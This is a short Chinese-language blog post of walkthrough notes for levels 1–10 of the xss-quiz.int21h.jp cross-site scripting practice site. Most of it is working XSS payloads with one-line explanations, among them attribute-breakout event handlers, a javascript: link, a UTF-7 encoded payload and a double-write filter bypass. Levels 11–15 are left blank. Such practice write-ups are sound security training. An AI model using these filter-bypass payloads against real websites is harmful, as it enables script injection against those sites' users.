XSS Challenges通关笔记
2021-09-24 本文已影响0人
芝士份子
xss-quiz.int21h.jp平台
1
<script>alert(document.domain);</script>
2
"><script>alert(document.domain);</script>
自此以下使用工具传递参数避免被编码
3
<script>alert(document.domain);</script>
注入点在p2参数回显上
4
"><script>alert(document.domain);</script>
注入点在p3参数的回显上
5
"><script>alert(document.domain);</script>
水题
6
" onmouseover=alert(document.domain) class="a
参数被转义 故使用事件触发
7
" onmouseover=alert(document.domain) "
与第六关一样
8
javascript:alert(document.domain);
填入链接自动生成a标签url 因为过滤了尖括号等 构造伪协议点击触发
javascript:表示触发默认动作时,执行一段JavaScript代码
9
raw: " onmouseover=alert(document.domain)>
utf-7: +/v8 +ACI- onmouseover=alert(d+AG8AYw-u+AG0-en+AHQALg-d+AG8AbQBh-in)+AD4-
提交
复现
回显
仅IE浏览器支持UTF-7编码 须在IE下测试
10
111"><script>alert(document.dodomainmain);</script>
双写绕过
11
12
13
14
15
参考链接:
